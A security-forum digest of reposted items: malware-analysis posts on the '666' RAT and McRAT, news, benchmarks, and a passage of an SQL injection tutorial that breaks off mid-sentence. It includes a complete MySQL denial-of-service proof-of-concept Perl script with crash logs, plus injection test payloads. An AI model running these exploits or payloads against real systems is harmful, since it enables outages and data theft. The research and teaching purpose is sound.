Nytro

Generic Unpacking of Self-mo difying, Aggressive, Packed Binary Programs Piotr Bania bania.piotr@gmail.com March 2009 Abstract Nowadays most of the malware applications are ei- ther packed or protected. This techniques are ap- plied esp ecially to evade signature based detectors and also to complicate the job of reverse engineers or security analysts. The time one must sp end on unpacking or decrypting malware layers is of- ten very long and in fact remains the most compli- cated task in the overall pro cess of malware anal- ysis. In this rep ort author prop oses MmmBop as a relatively new concept of using dynamic binary instrumentation techniques for unpacking and by- passing detection by self-mo difying and highly ag- gressive packed binary co de. MmmBop is able to deal with most of the known and unknown pack- ing algorithms and it is also suitable to successfully bypass most of currently used anti-reversing tricks. This framework do es not dep end on any other 3rd party software and it is develop ed entirely in user mo de (ring3). MmmBop supp orts the IA-32 archi- tecture and it is targeted for Microsoft Windows XP, some of the further delib erations will b e refer- ring directly to this op erating system. Download: http://piotrbania.com/all/articles/pbania-dbi-unpacking2009.pdf

MySQL Denial of Service Zeroday PoC From: king cope <isowarez.isowarez.isowarez () googlemail com> Date: Sat, 1 Dec 2012 22:26:16 +0100 (see attachment) Kingcope Attachment: mysql-dos.txt 5.5.19-log on SuSE Linux DoS exploit: -------------------------------------------------------------------------------------------------------- use Net::MySQL; use Unicode::UTF8 qw[decode_utf8 encode_utf8]; $|=1; my $mysql = Net::MySQL->new( hostname => '192.168.2.3', # Default use UNIX socket database => 'test', user => "monty", password => "python", debug => 1, ); $mysql->_execute_command("\x12", "\x00\x00\x00\x00 foo"); exit; for ($k=0;$k<50000;$k++) { $a .="<A$k>"; } for ($k=0;$k<50000;$k++) { $a .="</A$k>"; } # SELECT example $mysql->query("SELECT UpdateXML('<a>$a<b>ccc</b><d></d></a>', '/a', '<e>fff</e>') AS val1"); my $record_set = $mysql->create_record_iterator; while (my $record = $record_set->each) { printf "First column: %s Next column: %s\n", $record->[0], $record->[1]; } $mysql->close; Crash Log: -------------------------------------------------------------------------------------------------------- started: /usr/local/mysql/bin/mysqld --log=/tmp/mysql55.log --user=mysql --log-bin=/tmp/logbin2 & 120108 12:55:28 - mysqld got signal 11 ; This could be because you hit a bug. It is also possible that this binary or one of the libraries it was linked against is corrupt, improperly built, or misconfigured. This error can also be caused by malfunctioning hardware. We will try our best to scrape up some info that will hopefully help diagnose the problem, but since we have already crashed, something is definitely wrong and this may fail. key_buffer_size=16777216 read_buffer_size=262144 max_used_connections=1 max_threads=151 thread_count=1 connection_count=1 It is possible that mysqld could use up to key_buffer_size + (read_buffer_size + sort_buffer_size)*max_threads = 133453 K bytes of memory Hope that's ok; if not, decrease some variables in the equation. Thread pointer: 0x8e6fa48 Attempting backtrace. You can use the following information to find out where mysqld died. If you see no messages after this, something went terribly wrong... stack_bottom = 0xa868b35c thread_stack 0x30000 /usr/local/mysql/bin/mysqld(my_print_stacktrace+0x33)[0x83b0f63] /usr/local/mysql/bin/mysqld(handle_segfault+0x4bc)[0x813c59c] [0xffffe400] /usr/local/mysql/bin/mysqld(_Z16dispatch_command19enum_server_commandP3THDPcj+0x11b4)[0x81b09e4] /usr/local/mysql/bin/mysqld(_Z10do_commandP3THD+0xbc)[0x81b13ac] /usr/local/mysql/bin/mysqld(_Z24do_handle_one_connectionP3THD+0x183)[0x823eb63] /usr/local/mysql/bin/mysqld(handle_one_connection+0x3c)[0x823ebbc] /lib/libpthread.so.0(+0x5b05)[0xb771cb05] /lib/libc.so.6(clone+0x5e)[0xb74e7d5e] Trying to get some variables. Some pointers may be invalid and cause the dump to abort. Query ((nil)): is an invalid pointer Connection ID (thread ID): 12 Status: NOT_KILLED The manual page at http://dev.mysql.com/doc/mysql/en/crashing.html contains information that should help you find out what is causing the crash. Version: '5.5.19-log' socket: '/var/run/mysql/mysql.sock' port: 3306 Source distribution [New Thread 0xa8f1db70 (LWP 7907)] 120108 13:01:51 [Warning] IP address '192.168.2.150' could not be resolved: Name or service not known 120108 13:01:51 [Note] Start binlog_dump to slave_server(65), pos(, 4294967295) Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 0xa8f1db70 (LWP 7907)] mysql_binlog_send (thd=0x8e6fb28, log_ident=0x8eb57a8 "", pos=<value optimized out>, flags=65535) at /root/mysql-5.5.19/sql/sql_repl.cc:1043 1043 log_file_name, (llstr(my_b_tell(&log), llbuff2), llbuff2)); (gdb) x/10i $eip => 0x81bf54a <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370>: mov 0x8(%ecx),%edx 0x81bf54d <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1373>: mov 0x4(%ecx),%eax 0x81bf550 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1376>: mov %edx,0x4(%esp) 0x81bf554 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1380>: mov %eax,(%esp) 0x81bf557 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1383>: call 0x8541560 <llstr> 0x81bf55c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1388>: mov -0x9b0(%ebp),%edx 0x81bf562 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1394>: lea -0x590(%ebp),%eax 0x81bf568 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1400>: mov %edi,0x1c(%esp) 0x81bf56c <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1404>: lea -0x990(%ebp),%edi 0x81bf572 <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1410>: mov %eax,0x18(%esp) (gdb) i r eax 0xa8f1c804 -1460549628 ecx 0x0 0 edx 0xa8f1c805 -1460549627 ebx 0x8e821e0 149430752 esp 0xa8f1be50 0xa8f1be50 ebp 0xa8f1c868 0xa8f1c868 esi 0xa8f1c81a -1460549606 edi 0xa8f1c804 -1460549628 eip 0x81bf54a 0x81bf54a <mysql_binlog_send(THD*, char*, my_off_t, ushort)+1370> eflags 0x210282 [ SF IF RF ID ] cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x33 51 unprivileged user (REPLICATION_SLAVE privs needed to trigger the bug): -------------------------------------------------------------------------------------------------------- C:\Users\kingcope\Desktop>perl mysql.pl Use INET Socket: 192.168.2.3 3306/tcp Net::MySQL::_get_server_information(): 4E 00 00 00 0A 35 2E 35 2E 31 39 2D 6C 6F 67 00 N....5.5.19-log. 01 00 00 00 59 4C 50 2C 29 28 2E 4F 00 FF F7 08 ....YLP,)(.O.... 02 00 0F 80 15 00 00 00 00 00 00 00 00 00 00 22 ................ 59 7C 24 3A 36 40 21 22 26 38 29 00 6D 79 73 71 Y...6....8).mysq 6C 5F 6E 61 74 69 76 65 5F 70 61 73 73 77 6F 72 l_native_passwor 64 00 d. Protocol Version: 10 Server Version: 5.5.19-log Salt: YLP,)(.O"Y|$:6 () !"&8) Net::MySQL::_send_login_message(): 41 00 00 01 0D A6 03 00 00 00 00 01 21 00 00 00 A............... 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 6D 6F 6E 74 79 32 00 14 21 2F FB 64 ....monty2.....d 27 B4 FE 26 89 F7 D6 E7 2A A1 C9 00 A9 CF 4E 51 '.......*.....NQ 74 65 73 74 00 test. Net::MySQL::_request_authentication(): 07 00 00 02 00 00 00 02 00 00 00 ........... connect database Net::MySQL::_execute_command(): 0A 00 00 00 12 00 00 00 00 00 00 FF 00 00 .............. Net::MySQL::_execute_command(): 68 00 00 01 FF CB 04 23 34 32 30 30 30 41 63 63 h.......42000Acc 65 73 73 20 64 65 6E 69 65 64 3B 20 79 6F 75 20 ess.denied;.you. 6E 65 65 64 20 28 61 74 20 6C 65 61 73 74 20 6F need.(at.least.o 6E 65 20 6F 66 29 20 74 68 65 20 52 45 50 4C 49 ne.of).the.REPLI 43 41 54 49 4F 4E 20 53 4C 41 56 45 20 70 72 69 CATION.SLAVE.pri 76 69 6C 65 67 65 28 73 29 20 66 6F 72 20 74 68 vilege(s).for.th 69 73 20 6F 70 65 72 61 74 69 6F 6E is.operation Sursa: Full Disclosure: MySQL Denial of Service Zeroday PoC

Torvalds clarifies Linux's Windows 8 Secure Boot position | ZDNet

[h=1]Compress Data More Densely with Zopfli[/h] The Zopfli Compression Algorithm is a new, open sourced general purpose data compression library that got its name from a Swiss bread recipe. It is an implementation of the Deflate compression algorithm that creates a smaller output size compared to previous techniques. The smaller compressed size allows for better space utilization, faster data transmission, and lower web page load latencies. Furthermore, the smaller compressed size has additional benefits in mobile use, such as lower data transfer fees and reduced battery use. The higher data density is achieved by using more exhaustive compression techniques, which make the compression a lot slower, but do not affect the decompression speed. The exhaustive method is based on iterating entropy modeling and a shortest path search algorithm to find a low bit cost path through the graph of all possible deflate representations. The output generated by Zopfli is typically 3–8% smaller compared to zlib at maximum compression, and we believe that Zopfli represents the state of the art in Deflate-compatible compression. Zopfli is written in C for portability. It is a compression-only library; existing software can decompress the data. Zopfli is bit-stream compatible with compression used in gzip, Zip, PNG, HTTP requests, and others. Due to the amount of CPU time required, 2–3 orders of magnitude more than zlib at maximum quality, Zopfli is best suited for applications where data is compressed once and sent over a network many times — for example, static content for the web. By open sourcing Zopfli, thus allowing webmasters to better optimize the size of frequently accessed static content, we hope to make the Internet a bit faster for all of us. By Lode Vandevenne, Software Engineer, Compression Team Sursa: Google Open Source Blog: Compress Data More Densely with Zopfli

[h=1]Hacking Group obtains 1TB of Data from Governments[/h]Posted by: FastFlux March 1, 2013 The primary targets seem to be government authorities from Asia, the Middle East and Eastern Europe. Academic and military institutions, an embassy and even a major search engine have also been targeted. Established by the company’s research, approximately 30,000 organizations had data stolen over a period of a few years. The cybercriminals use approximately 500 command and control servers, each being capable of transmitting data with 20 victims at a time. Each of these severs is capable of extracting around 2.4 GB of information per day, amounting to 1 TB of data stolen per day, and 365 TB in a year. The company hasn’t provided many details about the attacker, but Team Cymru Director Steve Santorelli has told The Verge that judging by the vast quantity of data, it’s most likely the work of a state-sponsored group. No known countries are took part in these attacks, which is part of the problem. According to analysts and investigators US networks are assaulted daily by hackers. Some of these hackers are developing custom-made software designed to assist taking hold of computer systems. Sursa: Hacking Group obtains 1TB of Data from Governments | ZeroSecurity

It's a Kind of Magic In our last post we shared our initial analysis of the malware that is installed as a result of the PDF found in the wild that exploits the then-zero-day vulnerabilities, CVE-2013-0640 and CVE-2013-0641. Today we are sharing more details about this new malware, which we have dubbed "666." The following is not a complete analysis, but outlines some of the main functionality and its interesting features. At its heart, this malware is a remote administration tool (RAT) with information-stealing capabilities. It initially accomplishes its goals through the use of three separate DLLs that work in harmony, each playing its own role. We say "initially" because there appears to be support for DLL plugins to be added in the future. There are also references to 64-bit versions of the initial three DLLs. For example, there is a LangBar64.dll to complement LangBar32.dll. For the remainder of this post, we will refer to the DLLs by their filenames but without the "32" or "64" characters at the end. The DLLs appear to be compiled with MinGW, judging by the way parameters are placed on the stack and from strings found in the DLLs. They all employ a string encryption technique for which we are sharing an IDA IDC script to aid any researchers who wish to study further. A simplified illustration of how key stroke, clipboard, and account data are collected and exfiltrated Components LangBar is the main module that drives execution. It has an export named CallW that is called in order to install it on the system. It maintains persistence by creating several registry items, including HKCU\Software\Microsoft\CTF\LangBarAddin\{12345678-1234-1234-1234567890AB}\’FilePath’ = <path to LangBar>. With ctfmon.exe running and the proper registry values set, this DLL will be loaded into all created processes. It behaves differently depending on which process it is loaded into. The DLL loaded into explorer.exe is the main instance, coordinating behavior with all the other instances of the loaded DLLs. Any behavior that the author designed to only occur in one instance happens from Explorer. LangBar is responsible for loading the other DLLs into its process and lbarext is only loaded into the Explorer process due to its nature, which will be explained later. Coordination between the processes and DLLs occur in several ways, including registry keys and values stored under the key HKCU\Software\Microsoft\Media\Other (referred to as "the Media key" for the remainder of this blog), named file mapping objects, and a named pipe. Instances where Langbar is loaded into processes for popular internet applications such as the browsers, messengers, and mail clients mentioned in our previous blog can serve as the downloading/uploading component, using the mutex JKDFHIUEJDH to coordinate whose responsibility it is. lbarhlp is mainly a data theft component. It writes the stolen data to the named pipe \\.\pipe\H5_kds..8j23_zsP2. It checks which process it is loaded into against a small list (iexplore.exe,outlook.exe,msnmsgr.exe,wlmail.exe,winmail.exe) and performs data theft specific to that application, usually account- and cache-related, using various Windows APIs and the registry. It installs a key logging hook that also steals clipboard data. We found a very interesting easter egg of sorts in the key logging thread. If the victim types the letters "optresclone," a message box appears that reads, "It's a kind of magic!" and it proceeds to log this event with a timestamp and the word "secreto." The message box text may be a reference to the Queen song "A Kind of Magic." This seemed to be a peculiar move by the author. It's somewhat of a risk to put this in as a joke since it could give the malware's presence away in the off chance someone happens to type this sequence of characters. Further pondering on this led to the theory that this may be some kind of extortion feature. The attacker could spy on his target(s) for a while and then threaten them. If they ask for proof that he has compromised them, the attacker can just tell them to type the magic word and the victims would be able to see for themselves. As a result, this provides an easy way for someone to determine if he was the victim of this attack: just type "optresclone" into one of the monitored applications such as Internet Explorer and see if the message box appears. We caution that victims' computers should be disconnected from the network before performing this test and not allowed back onto a network until the malware has been disabled in order to avoid tipping off the attacker that you are aware of his presence. lbarext is mainly responsible for receiving stolen data from lbarhlp and then packaging and encrypting it. It reads this data from the named pipe and stores it in an encrypted file named kmt32.pod. It is also responsible for processing commands that are received from the command and control (C&C) server. In addition to these tasks, it opens an invisible window with a Windows procedure that logs whenever a new volume is introduced to the system, including information provided by GetVolumeInformation for all attached drives. An interesting thing to note here is that the author spells disk with a "c" ("disc") in all cases. Typically, those in technology would refer to magnetic media using the "k" spelling ("disk") while using the "c" spelling to refer to optical media. For common usage of the word referring to flat, round objects, those in the UK typically use the word "c" spelling while those in the USA use the "k" spelling. Of course, no strong conclusions can be made from this. Commands The commands it supports can be broken down into two categories: "configuration commands" and "RAT commands." The RAT commands include the following: Log connected volume information Scan directory Steal directory Steal file Get system/network info Call plugin export Scan registry key Remote shell The scan/steal commands follow blacklists and whitelists for directory names and file extensions that are stored under the Media key. Directory names and file extensions that are present in the blacklists are ignored, and only whitelisted file extensions are considered. Information about files already stolen is also stored under the Media key to avoid sending the same file twice. The initial configuration of these lists tends to slant towards documents and away from media and code related files. The extensibility of this RAT is noteworthy. It has a plugin architecture, allowing the user to craft new DLLs that export functions that follow a particular convention and can be integrated seamlessly. One of the arguments passed to a plugin DLL must be the name of the named pipe, \\.\pipe\H5_kds..8j23_zsP2, which is where the data is written to be sent out. The configuration commands include the following: add/remove Media key/val add/remove whitelist/blacklist scan entry add/remove automated tasks delete file/directory change C&C URL Of note here is the ability to change C&C servers and the ability to configure automated tasks. Automated tasks can be any supported command and can be configured to run at specific times. Command and Control (C&C) HTTP is used for C&C. Each beacon is a GET request followed by a POST request. The GET request is used as a test to ensure that the C&C server is still available and valid. In the case that a "Proxy Authentication Required" response code is issued (407), the malware will attempt to authenticate using each set of credentials it has stolen in turn. If an "OK" response code is issued (200), these credentials are stored in a separate value in the registry under the Media key for future use. The original C&C server information is hardcoded as encrypted strings. The domain name "Bollsilloner.es" is interesting because "bolsillo" is Spanish for "pocket" and when you pronounce "Bolsilloner" aloud, it sounds like "bazillionaire." The POST request sends its data in multipart/form-data format. During our live run of the malware, we were able to capture a pcap of the initial communications sent and received. We witnessed the requests for the lbarhlp and lbarext DLLs and what we believe to be a request for commands. The field name "i" was present in all POST requests and is the same value that can be found in the "ID" value under the Media key. This may be an identifier for the victim based on the name "ID" and the fact that it is sent with each request. The field name "c" was set to "2" when requesting files to be downloaded, "0" when uploading files, and "1" for the requests that received a response with an empty body. A "c" value of "1" may indicate the request for commands. Most of the inbound and outbound data is compressed and encrypted. Registry Values There are many registry values employed by this malware. Below are a few of the more significant ones to which we have uncovered the meaning. Most of these values use wide characters and are encrypted. We have provided a python decryption tool for researchers and those affected by this RAT who wish to learn more about its configuration and activities. "UI:" A boolean value that, when set to true, will trigger uninstallation. May possibly be short for "Uninstall." "SD:" 8 characters representing a date: "YYYYMMDD." This value is used for a long term sleep feature where the malware will remain inactive until the date is reached. May possibly be short for "Sleep Date." "SP:" The directory where the installed DLL modules are located. May possibly be short for "Storage Path." "UT:" Another date formatted like "SD." When this date is reached, the malware uninstalls itself (sets "UI" to 1). May possibly be short for "Uninstall Time." "ID:" A string used as the value for the "i" parameter in the HTTP POST requests sent by the malware. This string may be an identifier for the victim, and also designates the filename used to store commands received that are to be processed. "AD:" An alternative URL for C&C, the default URL is hardcoded as an encrypted string. May possibly be short for "Alternative Download." "PI:" Base64 encoded value that holds the proxy name, username, and password for an HTTP proxy. May possibly be short for "Proxy Information." "PIS:" Base64 encoded value that holds all the sets of credentials stolen by the malware. May possibly be short for "Personal Information Storage." MiniDuke Kaspersky and CrySyS Lab recently released a report providing some details on another series of attacks using the same exploit that delivers this payload. They named the malware "MiniDuke" and raised the pertinent question of whether these attacks are related. Our initial research into this topic, although not conclusive, hints towards at least the authors of the malware being different. The same name has been used for all the droppers in the attacks found so far: "L2P.T." This was likely done out of convenience to avoid having to change the shellcode in any way. However, many differences are found in the droppers used in the MiniDuke attacks as compared to the dropper used in this attack. For starters, in this attack, the dropper was compiled with MinGW just like the malware payload itself. It also employs the same string encryption and error handling functions as the malware, whereas the MiniDuke droppers’ strings are plainly visible. The decoy PDF found in this dropper is encrypted whereas the MiniDuke dropper’s decoy PDF is plainly visible in the resource section. This dropper opens its decoy PDF directly using the ShellExecute API whereas MiniDuke’s dropper creates a BAT file that kills the existing acrobat process along with opening the decoy PDF. Lastly, the project’s pdb file path is not visible in this dropper’s strings as it is in MiniDuke’s droppers strings. Despite all these differences, there is still the curious reference to the number "666," which both of the payloads share, albeit in different ways. In this case, "666" is specified as the preferred image base address whereas in MiniDuke’s case, it is referenced as stray bytes in its code. The question remains: is this a coincidence or is there a connection? Additional Resources Download research tools here. Here are the MD5 hashes of the DLLs: LangBar32.dll - 97777f269ae807891dac4b388c66a952 lbarext32.dll - 1663de170dd03a105d5708841b709797 lbarhlp32.dll - 8e4954693a37a8e5731d0781ccec06c1 Special thanks to Gregory Newman for his assistance in analysis and tool writing. James T. Bennett on 2013.02.28 Sursa: Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats:It's a Kind of Magic

[h=2]YAJ0: Yet Another Java Zero-Day[/h] Through our Malware Protection Cloud (MPC), we detected a brand new Java zero-day vulnerability that was used to attack multiple customers. Specifically, we observed successful exploitation against browsers that have Java v1.6 Update 41 and Java v1.7 Update 15 installed. Not like other popular Java vulnerabilities in which security manager can be disabled easily, this vulnerability leads to arbitrary memory read and write in JVM process. After triggering the vulnerability, exploit is looking for the memory which holds JVM internal data structure like if security manager is enabled or not, and then overwrites the chunk of memory as zero. Upon successful exploitation, it will download a McRAT executable (MD5: b6c8ede9e2153f2a1e650dfa05b59b99 as svchost.jpg) from same server hosting the JAR file and then execute it. Figure 1. Example HTTP GET of the McRAT after the browser is successfully exploited, prior to the endpoint becoming fully compromised. The exploit is not very reliable, as it tries to overwrite a big chunk of memory. As a result, in most cases, upon exploitation, we can still see the payload downloading, but it fails to execute and yields a JVM crash. When the McRAT successfully installs in the compromised endpoint as an EXE (MD5: 4d519bf53a8217adc4c15d15f0815993), it generates the following HTTP command and control traffic: POST /59788582 HTTP/1.0 Content-Length: 44 Accept: text/html,application/xhtml+xml,application/xml,*/* User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 110.XXX.55.187 Pragma: no-cache 4PdWXOD3Vlzg91Zc4PdWXOD3Vlzg91Zc4PdWXMP1RXw. McRAT persists by writing a copy of itself as a DLL to (C:\Documents and Settings\admin\AppMgmt.dll) and performing the following registry modifications: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = C:\Documents and Settings\admin\AppMgmt.dll \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AppMgmt\Parameters\"ServiceDll" = %SystemRoot%\System32\appmgmts.dll This post was intended to serve as a warning to the general public. We have notified Oracle and will continue to work with Oracle on this in-the-wild discovery. Since this exploit affects the latest Java 6u41 and Java 7u15 versions, we urge users to disable Java in your browser until a patch has been released; alternatively, set your Java security settings to "High" and do not execute any unknown Java applets outside of your organization. We will continue to update this blog as new information about this threat is found. FireEye would like to acknowledge and thank Hermes Bojaxhi and his team at CyberESI for their assistance in confirming this Java zero-day vulnerability. This blog was written by FireEye researchers Darien Kindlund and Yichong Lin. Update: Oracle assigned CVE-2013-1493 on this vulnerability. Sursa: Malware Intelligence Lab from FireEye - Research & Analysis of Zero-Day & Advanced Targeted Threats:YAJ0: Yet Another Java Zero-Day

[h=1]Un exploit HTML5 permite ca orice website s?-?i umple hard disk-ul în câteva minute[/h] Aurelian Mihai - 1 mar 2013 Fie c? intr?m pe blog-ul cuiva pus pe glume proaste sau un website controlat de persoane r?u inten?ionate, calculatorul de pe care navig?m poate c?dea victim? unui exploit ce permite umplerea hard disk-ului cu date inutile ?i chiar blocarea web browser-ului. e vin? este o sc?pare strecurat? în standardul Web Storage, ce face parte din setul de tehnologii HTML5 livrate cu practic orice web browser modern. Func?ia Web Storage permite oric?rui website s? plaseze date pe hard disk-ul utilizatorului, folosite pentru a personaliza anumite servicii ?i aplica?ii. Problema este ca standardul nu define?te o limit? pentru volumul de date pe care un website îl poate depozita la un moment dat, de unde ?i riscul ca cineva s? transfere mai multe date decât este rezonabil, cauzând reale probleme utilizatorilor prin umplerea rapid? a hard disk-ului cu date. Din fericire, datele depozitate în acest mod sunt totu?i izolate de restul sistemului, iar atacatorul de ocazie nu poate ob?ine acces asupra PC-urilor vizate . În mod surprinz?tor, W3C (organiza?ia responsabil? de aprobarea tehnologiilor HTML5) a anticipat posibilitatea exploat?rii acestei sc?p?ri în mod r?u inten?ionat, recomandând dezvoltatorilor software s? limiteze spa?iul pe hard disk alocat fiec?rui website, sau s? includ? un mecanism care s? avertizeze utilizatorii atunci când website-ul pe care îl viziteaz? încearc? s? monopolizeze mai mult de 5 MB spa?iu de stocare. Deocamdat? doar Mozilla pare s? fi luat în serios avertismentele primite, incluzând anumite mecanisme de protec?ie care feresc utilizatorii Firefox de nepl?ceri. În schimb, utilizatorii Google Chrome, Microsoft Internet Explorer, Opera ?i Apple Safari sunt l?sa?i descoperi?i. Mai mult decât atât, odat? cu epuizarea spa?iului disponibil pe hard disk web browser-ul Chrome se confrunt? cu blocaje frecvente ce dau ?i mai multe nepl?ceri utilizatorilor. Cei care doresc s? experimenteze pe propriul risc acest exploit pot vizita website-ul FillDisk.com. Trebuie ?tiut c? spa?iul de stocare ocupat în mod abuziv poate fi recuperat folosind op?iunea pentru ?tergerea istoricului de navigare din browser-ul web, având bifat? op?iunea fi?iere temporare ?i datele website-urilor. Sursa: Un exploit HTML5 permite ca orice website s?-?i umple hard disk-ul în câteva minute

The MiniDuke Mystery: PDF 0day Government Spy Assembler 0x29A Micro Backdoor Authors: Costin Raiu, Igor Soumenkov, Kurt Baumgartner, Vitaly Kamluk Global Research and Analysis Team, Kaspersky Lab On Feb 12th 2013, FireEye announced the discovery (http://blog.fireeye.com/research/2013/02/the-number-of-the-beast.html) of an Adobe Reader 0-day exploit which is used to drop a previously unknown, advanced piece of malware. We called this new malware “ItaDuke” because it reminded us of Duqu and because of the ancient Italian comments in the shellcode copied from Dante Aligheri’s Divine Comedy. Since the original announcement, we have observed several new incidents using the same exploit (CVE-2013-0640), some of which were so unusual that we decided to analyze them in depth. Together with our partner CrySyS Lab, we’ve performed a detailed analysis of these new incidents which indicate a new, previously unknown threat actor. For their analysis, please read http://blog.crysys.hu/2013/02/miniduke/ . For our analysis, please read below. First of all, while the fake “Mandiant” PDF reports (see http://blog.seculert.com/2013/02/spear-phishing-with-mandiant-apt-report.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SeculertResearchLab+(Seculert+Research+Lab)) are just dirty hacks of the original exploit, these newer attacks appear to have been created by a 0-day toolkit that was used to build the original “Visaform Tukey.pdf” discovered by FireEye. Download: http://www.securelist.com/en/downloads/vlpdfs/themysteryofthepdf0-dayassemblermicrobackdoor.pdf

[h=1]Primul telefon fara difuzor din lume, adus la MWC 2013. Poti vorbi la el si prin pereti. VIDEO[/h]Torque Kyocera este un smartphone cu totul si cu totul special. Din nefericire, Torque Kyocera nu se comercializeaza in Europa si in ciuda design-ului mai putin elegant este uimitor prin faptul ca nu are difuzor. Sunetul este redat insa prin intermediul unui dispozitiv care reuseste sa transmita vibratia prin orice suprafata catre utilizator, chiar si cand acesta poarta casti. Video: Primul telefon fara difuzor din lume, adus la MWC 2013. Poti vorbi la el si prin pereti. VIDEO

Linux possible privilege escalation exploits Vad ca pe mailing list-uri apar tot mai multe fix-uri pentru NULL pointer dereference-uri sau alte probleme care pot duce la privilege escalation. Cateva: - oss-sec: CVE request: Linux kernel: USB: io_ti: NULL pointer dereference - oss-sec: CVE request - Linux kernel: VFAT slab-based buffer overflow - oss-sec: kernel: tmpfs use-after-free - oss-sec: CVE request - Linux kernel: evm: NULL pointer de-reference flaw - oss-sec: CVE request -- Linux kernel: net: CIPSO_V4_TAG_LOCAL tag NULL pointer dereference - oss-sec: CVE request -- Linux kernel: mm: thp: pmd_present and PROT_NONE local DoS - oss-sec: Linux kernel race condition with PTRACE_SETREGS (CVE-2013-0871) Va puteti uita peste ele. Nu e dificil sa mmap-ezi la o adresa corecta.

Story of a Cient-Side Attack 1. Introduction During an ethical hacking project the experts of Silent Signal LLC were mandated to elevate their privileges on the restricted workstations of the client. Taking into account the relatively strict host and network controls in place we decided to share some of our experiences gathered during the project. Naturally, in accordance with our contracts the identifying information about the client and other sensitive data was removed or changed. Download: www.exploit-db.com/download_pdf/24554

Am vazut ca a aparut azi Internet Explorer 10 si am zis sa ii fac o proba. Prima proba: SunSpider JavaScript Benchmark Rezultate: 1. Internet Explorer 10.0.9200 (Total: 112.4ms +/- 0.7%) 2. Google Chrome 25.0.1364 (Total: 154.3ms +/- 1.6%) 3. Mozilla Firefox 19.0 (Total: 183.3ms +/- 1.3%) Asta doar ca sa atrag atentia "haterilor" Revin cu mai multe daca am timp sa mai testez.

DOUBLE QUERY INJECTIONS DEMYSTIFIED Audi-1 February 27, 2013 In the last article of the series, we started to explore the world of SQL injections by discussing different types and using the test bed available at https://github.com/Audi-1/sqli-labs. You can review the last post here. Now, we will explore SQL injections even further and discuss Error based Double query injections, which are sometimes called sub query injections. Some people also refer to them as blind injections but I prefer to call them error based, as we would be using the errors to dump out the information to us. This would also go along the classification scheme we discussed in part1. I will be using the first post as a base and refer to it to explain the next part. For this post, we will use Less-5 and Less-6 of the SQLI-LABS test bed. Let’s start with the same enumeration process as discussed in the last article and see how it goes from there. We observe that the Less-5 and Less-6 look similar to the earlier lessons but with a very subtle difference. In earlier lessons, we were getting back username and password on the screen, but here we only get the message “You are in………” Even if we iterate over the parameter ID with values from 1 to 14 we get same response. ANALYSIS OF THE ENUMERATION ID=1 => You are in……… ID=2 => You are in……… ID=3 => You are in……… ID=4 => You are in……… ID=5 => You are in……… ID=6 => You are in……… ID=7 => You are in……… ID=8 => You are in……… ID=9 => You are in……… ID=10 => You are in……… ID=11 => You are in……… ID=12 => You are in……… ID=13 => You are in……… ID=14 => You are in……… ID=15 => no output ID=0 => no output ID=99 => no output ID=string => no output RESULT OF ENUMERATION: The application has 14 different entities; it returns “You are in…” on a valid entity, but returns a blank response on an invalid entity. FUZZING: As explained in the previous article, we fuzz the application to see if we are able to get traces of injection possibilities and find out how the application reacts to our malicious inputs. Integer or String test: Because the input looks to be integer type, therefore we try to test if the input is a real integer or if it also accepts string. For this, we try to inject a string into the parameter ID and examine the response. We observe that the application does not crash but it treats the string input similar to non existent values. Some other injections could be as follows: ‘ “ \ ; %00 ) ( aaa Using these, we observe that our application crashes, giving out a MySQL error. Less-5 http://localhost/sqli-labs/Less-5/?id=1‘ Less-6 http://localhost/sqli-labs/Less-6/?id=1? So by injecting a single quote, we observe that Less-5 produces a MySQL error whereas Less-6 Does not. The reverse happens if we inject double quotes instead: http://localhost/sqli-labs/Less-5/?id=1? http://localhost/sqli-labs/Less-6/?id=1“ IMPORTANT NOTE: From enumeration and the fuzzing process, we learned that the database is not reflecting back any output to the webpage, therefore we cannot use the UNION SELECT to dump the database information. The only information we see reflecting back from the database on the webpage is in the form of MySQL errors. Therefore, we need to craft our queries in such a way that we are able to dump the database information through errors. The criteria for the query is that it’s syntactically correct and accepted by db driver and passed on to the backend database for execution. This query should then produce a logical error and dump information as an error string with the error returned. (Confused? Don’t worry, we will clear it shortly) Guessing the Query: From the fuzzing we did, we learned some useful information about the application. Now it’s time to guess the backend query. We observed that the Less-5 produces an error with the addition of a single quote, and Less-6 produces an error with the addition of double quotes. To assure ourselves that only quotes or double quotes are used to wrap around the variable in original query, we try to break the application with the addition of the escape character \. Less-5 http://localhost/sqli-labs/Less-5/?id=1\ On Less-5, let’s look at the part of the error dumped on the screen containing 1\, which is near ‘ ’1\’ LIMIT 0,1? at line 1. We observe that, with our input of 1\, a single quote is visible after that, indicating that single quotes are used as a wrapper for the strings. Less-6 http://localhost/sqli-labs/Less-6/?id=1\ On Less-6, let’s look at the part of the error dumped on the screen containing 1\, which is near ‘ “1\” LIMIT 0,1? at line 1. We observe that, with our input of 1\, a double quote is visible after that, indicating that only double quotes are used as a wrapper for the strings. COMMENTING OUT REST OF QUERY Since we discovered that Less-5 uses single quotes as string boundaries, we now inject a quote by adding comments at the end to fix the query. ID=1 ‘ –+ For Less-6, we can use this injection to fix the query. ID=1? –+ Therefore, after effective guessing, the query would be: Less-5 SELECT * FROM table_name WHERE ID=’Value we inject’ LIMIT 0,1 Less-6 SELECT * FROM table_name WHERE ID= “Value we inject” LIMIT 0,1 UNDERSTANDING SUBQUERIES: Before we proceed further with SQL injection, we need to understand the basics of subqueries. Subqueries can be defined as putting a query inside an existing query, or cascading one query inside another. The objective is to dynamically produce the result of the inner query 